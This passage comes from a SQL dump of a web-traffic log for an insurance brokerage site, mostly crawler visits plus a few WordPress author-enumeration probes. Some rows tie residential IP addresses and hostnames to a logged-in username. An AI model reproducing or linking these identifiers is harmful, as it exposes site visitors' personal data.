Firefox/45.0','https://www.google.com','_notprovided_',1,'Win7 x64','Firefox 45','us','1366 x 768','www.google.com','','','','','0','0',0),(11678,'0b_e820161d78c8eb68fc46c70bc9f762e1','1459620671','142.105.32.180','cpe-142-105-32-180.nj.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','https://www.google.com','_notprovided_',1,'Win7 x64','Firefox 45','us','1366 x 768','www.google.com','','','','','0','0',0),(11679,'0b_e820161d78c8eb68fc46c70bc9f762e1','1459620680','142.105.32.180','cpe-142-105-32-180.nj.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 45','us','1366 x 768','','','','','','0','0',0),(11681,'0b_e820161d78c8eb68fc46c70bc9f762e1','1459620696','142.105.32.180','cpe-142-105-32-180.nj.res.rr.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 45','us','1366 x 768','','','','','','0','51',0),(11682,'0b_e820161d78c8eb68fc46c70bc9f762e1','1459620710','142.105.32.180','cpe-142-105-32-180.nj.res.rr.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/about-us/','',0,'Win7 x64','Firefox 45','us','1366 x 768','','','','','','0','51',0),(11684,'0b_b7411ff34b726bf6a309f94be1215500','1459620739','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/forms','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11685,'0b_b7411ff34b726bf6a309f94be1215500','1459620747','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11687,'0b_4a1e1bee461e83b3df0812ec15eeaf8d','1459623658','66.249.73.202','crawl-66-249-73-202.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11690,'0b_36e5e99feeb8e435953b43f8f8ead7aa','1459623659','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11691,'0b_bb518fe94418db0c9b5b63c02d26fa93','1459625091','180.76.15.26','baiduspider-180-76-15-26.crawl.baidu.com','/forms/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(11694,'0b_52246f94a471f10102eb7d9867a08992','1459626490','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11696,'0b_9e861d6f6dc297ff3d81f4a8aba8c7be','1459627309','100.43.81.146','spider-100-43-81-146.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(11697,'0b_b3109f36d03ede9fe96740afb9efb8db','1459627969','178.54.15.179','unallocated.sta.mtm.kiev.ua','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','ua','','','','','','','0','0',0),(11699,'0b_ee9d6f01db3227ce709836af76671628','1459631286','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11702,'0b_729b6d48c28dbf3bd987c9cb03841659','1459634370','50.62.176.220','p3plcpnl0694.prod.phx3.secureserver.net','/','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','empireins.com','',0,'WinXP','Chrome 5','us','','','','','','','2','0',0),(11703,'0b_7ee91114a2b49cb9651b68885a098cd6','1459634907','180.76.15.160','baiduspider-180-76-15-160.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(11706,'0b_8d1554f147956877fb0173e79e616804','1459634937','163.172.13.244','163-172-13-244.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11709,'0b_8d1554f147956877fb0173e79e616804','1459634940','163.172.13.244','163-172-13-244.rev.poneytelecom.eu','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11711,'0b_8d1554f147956877fb0173e79e616804','1459634942','163.172.13.244','163-172-13-244.rev.poneytelecom.eu','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11712,'0b_b1e3eb4aa7e69c9e19b6b6a86dde9e24','1459635003','66.249.73.178','crawl-66-249-73-178.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11715,'0b_b1e3eb4aa7e69c9e19b6b6a86dde9e24','1459635009','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11718,'0b_b8f5a9dc2177f5cbd7abcaed8bdd330d','1459635134','216.81.71.84','216.81.71.84','/','=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16','','',0,'Win7','','','','','','','','','0','0',0),(11721,'0b_a33926159cdbb3b1d9544cb6fc1b986e','1459636055','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11724,'0b_ea94a50e35b8c0b2e7bb88bcecc9af0a','1459636860','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(11727,'0b_5af5bf6988ff9b7b1cc8ea279b5b3055','1459640049','54.144.86.122','ec2-54-144-86-122.compute-1.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31','','',0,'Win7','','','','','Internet','','','','0','0',0),(11730,'0b_3b2c788dda1d0ffec432a49700685844','1459640386','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(11733,'0b_f2e0386020263c2ec5883700da29fa45','1459644566','180.76.15.135','baiduspider-180-76-15-135.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(11736,'0b_bffd128428a04ecc50c15fca798222b7','1459656313','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(11738,'0b_bffd128428a04ecc50c15fca798222b7','1459656316','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(11741,'0b_bffd128428a04ecc50c15fca798222b7','1459656320','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(11744,'0b_d08a17e7995982a291d51f917102bd2a','1459656354','100.43.91.26','spider-100-43-91-26.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(11747,'0b_bffd128428a04ecc50c15fca798222b7','1459656361','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(11750,'0b_bffd128428a04ecc50c15fca798222b7','1459656473','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(11751,'0b_bffd128428a04ecc50c15fca798222b7','1459656490','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(11753,'0b_bffd128428a04ecc50c15fca798222b7','1459656491','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','0',0),(11754,'0b_bffd128428a04ecc50c15fca798222b7','1459656494','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(11757,'0b_d60f65485a1f006426c29454e55d381b','1459657474','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11760,'0b_7ae8a6ac642249f6d9e3f66f2e05c020','1459657475','157.55.39.113','msnbot-157-55-39-113.search.msn.com','[404] /art/carriers2.swf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11763,'0b_96a25f6c7cf1efac75ece878771f363f','1459661265','100.43.90.10','spider-100-43-90-10.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(11765,'0b_96a25f6c7cf1efac75ece878771f363f','1459661267','100.43.90.10','spider-100-43-90-10.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(11766,'0b_38d572efa1924befe315b641443674a7','1459662685','37.187.56.66','crawl19.lp.007ac9.net','/robots.txt','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(11768,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662686','37.187.56.66','crawl19.lp.007ac9.net','/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11771,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662690','37.187.56.66','crawl19.lp.007ac9.net','/agent-tools/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11774,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662692','37.187.56.66','crawl19.lp.007ac9.net','/register/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11777,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662695','37.187.56.66','crawl19.lp.007ac9.net','/about-us/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11780,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662698','37.187.56.66','crawl19.lp.007ac9.net','/insentives/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11781,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662700','37.187.56.66','crawl19.lp.007ac9.net','/licensing-contracting/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11783,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662703','37.187.56.66','crawl19.lp.007ac9.net','/carriers/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11786,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662706','37.187.56.66','crawl19.lp.007ac9.net','/contact/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11789,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662709','37.187.56.66','crawl19.lp.007ac9.net','/case-status/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11792,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662711','37.187.56.66','crawl19.lp.007ac9.net','/forms/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11793,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662716','37.187.56.66','crawl19.lp.007ac9.net','/igo/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11795,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662719','37.187.56.66','crawl19.lp.007ac9.net','/term-quotes/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11798,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662722','37.187.56.66','crawl19.lp.007ac9.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11801,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662724','37.187.56.66','crawl19.lp.007ac9.net','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11802,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662727','37.187.56.66','crawl19.lp.007ac9.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11805,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662730','37.187.56.66','crawl19.lp.007ac9.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11808,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662732','37.187.56.66','crawl19.lp.007ac9.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11810,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662735','37.187.56.66','crawl19.lp.007ac9.net','/?page_id=169','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11811,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662738','37.187.56.66','crawl19.lp.007ac9.net','/about-us/meet-the-eib-team/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11813,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662740','37.187.56.66','crawl19.lp.007ac9.net','/members/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11816,'0b_829b4ac0ef5e6fbc89b3b2ea0d82fc07','1459662743','37.187.56.66','crawl19.lp.007ac9.net','/meet-the-eib-team/','Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Linux','Firefox 31','','','','Unknown Spider','','','','3','0',0),(11819,'0b_0cd05a608df5faf8bdd5167995917dda','1459667905','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11822,'0b_3e84907b45e90a27fe80a6375cff465a','1459668031','66.249.73.178','crawl-66-249-73-178.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11825,'0b_32b8249be44211e9eef1e00f13f9f482','1459677443','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11826,'0b_68081fb0a55818d4543bf76347958c7f','1459679784','66.249.73.178','crawl-66-249-73-178.googlebot.com','/quotes.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11829,'0b_336b1e913e85656b34eacaf9e9084a15','1459682090','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(11832,'0b_0bfb33e01e7d831b7b30796b389a112d','1459685958','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11834,'0b_be2ee865ce03cc0cfe1bd0050f14528c','1459686804','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11837,'0b_6f2f9f69ad401235c5e2aaf18daf5ecc','1459686943','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(11840,'0b_080e82f1dfe50521d9df21a3b3ba3780','1459687864','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11841,'0b_c58ea52b643804eb067967edf7ff17e9','1459691066','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11843,'0b_7d1bacad495e44f07ce9c14148e6867d','1459694129','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11844,'0b_6e693605951059582727e6ba4c696c3d','1459694907','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11846,'0b_536e3669bb87b940787bdb733366d424','1459695731','184.154.36.163','scan21.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11847,'0b_536e3669bb87b940787bdb733366d424','1459695734','184.154.36.163','scan21.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11849,'0b_536e3669bb87b940787bdb733366d424','1459695737','184.154.36.163','scan21.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11850,'0b_536e3669bb87b940787bdb733366d424','1459695739','184.154.36.163','scan21.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11853,'0b_536e3669bb87b940787bdb733366d424','1459695742','184.154.36.163','scan21.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11855,'0b_536e3669bb87b940787bdb733366d424','1459695747','184.154.36.163','scan21.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11858,'0b_536e3669bb87b940787bdb733366d424','1459695750','184.154.36.163','scan21.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11859,'0b_df4ba646854c2bec91f016017ebb7036','1459696334','46.149.186.19','tun-46-149-186-19.kim.in.ua','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','ua','','','','','','','0','0',0),(11862,'0b_8871be8472b052db1f9d7f0bdf2842d5','1459699106','114.27.237.202','114-27-237-202.dynamic.hinet.net','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(11864,'0b_8871be8472b052db1f9d7f0bdf2842d5','1459699108','114.27.237.202','114-27-237-202.dynamic.hinet.net','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(11867,'0b_8871be8472b052db1f9d7f0bdf2842d5','1459699109','114.27.237.202','114-27-237-202.dynamic.hinet.net','/?author=2','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(11870,'0b_f52165615d36f96f303b52927e94a9f3','1459701083','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11871,'0b_f75a7e3749ddc2843606ae90710c11db','1459702218','66.249.75.96','crawl-66-249-75-96.googlebot.com','/carriers/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11873,'0b_7e7b15b7a155b8f0bafa837238b7616b','1459706793','180.76.15.135','baiduspider-180-76-15-135.crawl.baidu.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(11874,'0b_ae1bbd686d076595f8ecc100555442b8','1459707941','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(11877,'0b_01e1e7b86d954c595b69649e626b5517','1459710138','40.77.167.47','msnbot-40-77-167-47.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11880,'0b_01e1e7b86d954c595b69649e626b5517','1459710333','40.77.167.47','msnbot-40-77-167-47.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11883,'0b_01e1e7b86d954c595b69649e626b5517','1459711110','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/SSO/235_18.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11885,'0b_7e4fb089e70d3303ec88e0b43a54586a','1459711761','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11886,'0b_8aa8fefb2562a85bfc6df06e5f74ed68','1459712317','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(11889,'0b_06b6171459b87837da703bd660701612','1459715884','45.79.89.188','li1188-188.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(11891,'0b_6479f75565a7e1f84204d6a3cf635f95','1459716222','141.8.143.235','spider-141-8-143-235.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(11894,'0b_99e321f7244afa2f39385d048ab32131','1459720335','66.249.75.96','crawl-66-249-75-96.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11897,'0b_4d1594ceb4d44e3321f849d8f566f1db','1459721027','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; 